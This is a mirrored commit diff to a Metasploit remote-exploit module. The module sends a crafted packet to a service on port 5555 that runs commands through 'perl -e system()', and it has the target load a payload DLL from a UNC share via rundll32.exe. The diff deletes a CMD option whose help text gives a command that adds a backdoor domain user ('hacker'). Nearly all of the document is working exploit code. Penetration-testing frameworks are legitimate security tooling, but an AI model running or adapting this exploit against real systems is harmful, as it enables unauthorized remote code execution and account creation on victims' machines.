mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-29 18:07:27 +01:00
Delete CMD option
This commit is contained in:
parent
d4337ce1ae
commit
e04ff3ee24
@ -45,7 +45,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(5555),
|
||||
OptString.new('CMD',[false, 'The command to run e.g. net user hacker hacker123 /add /domain']),
|
||||
OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll'])
|
||||
], self.class)
|
||||
|
||||
@ -92,11 +91,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
end
|
||||
|
||||
def exec_bar(cmd)
|
||||
connect
|
||||
cmd = cmd.gsub("\\", "\\\\\\\\")
|
||||
vprint_status("Sending Command: #{cmd}")
|
||||
cmd.gsub!("\\", "\\\\\\\\")
|
||||
|
||||
cmd_no = target['Offset'] + cmd.length
|
||||
vprint_status("Size is #{cmd_no}")
|
||||
|
||||
pkt = "\x00\x00\x00"
|
||||
pkt << cmd_no
|
||||
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
|
||||
@ -104,40 +102,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
|
||||
pkt << "('#{cmd}')" # Executable
|
||||
pkt << "\x00"
|
||||
sock.put(pkt)
|
||||
# In my testing the default timeout (10) isn't enough
|
||||
if datastore['CMD']
|
||||
begin
|
||||
res = sock.get_once(-1, 20)
|
||||
rescue EOFError # happens when using the Powershell method
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
fail_with(Failure::Unknown, "#{peer} - Expected answer not received... aborting...") unless exec_bar?(res)
|
||||
disconnect
|
||||
else
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
||||
def exec_bar?(data)
|
||||
return false if data.blank?
|
||||
data_unpacked = data.unpack("NnVv")
|
||||
data_unpacked.length == 4 && data_unpacked[0] == 16 && data_unpacked[1] == 0xfffe && data_unpacked[2] == 0x39 && data_unpacked[3] == 0x20
|
||||
connect
|
||||
sock.put(pkt)
|
||||
disconnect
|
||||
end
|
||||
|
||||
def primer
|
||||
if datastore['CMD']
|
||||
print_status("Executing command #{datastore['CMD']}")
|
||||
exec_bar(datastore['CMD'])
|
||||
else
|
||||
self.file_contents = generate_payload_dll
|
||||
print_status("File available on #{unc}...")
|
||||
print_status("Sending load DLL to #{datastore['RHOST']}:#{datastore['RPORT']} - #{unc}")
|
||||
sploit = "rundll32.exe #{unc},"
|
||||
sploit << rand_text_numeric(1)
|
||||
exec_bar(sploit)
|
||||
end
|
||||
self.file_contents = generate_payload_dll
|
||||
print_status("File available on #{unc}...")
|
||||
|
||||
print_status("#{peer} - Trying to execute remote DLL...")
|
||||
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
|
||||
exec_bar(sploit)
|
||||
end
|
||||
end
|
||||
|
Loading…
Reference in New Issue
Block a user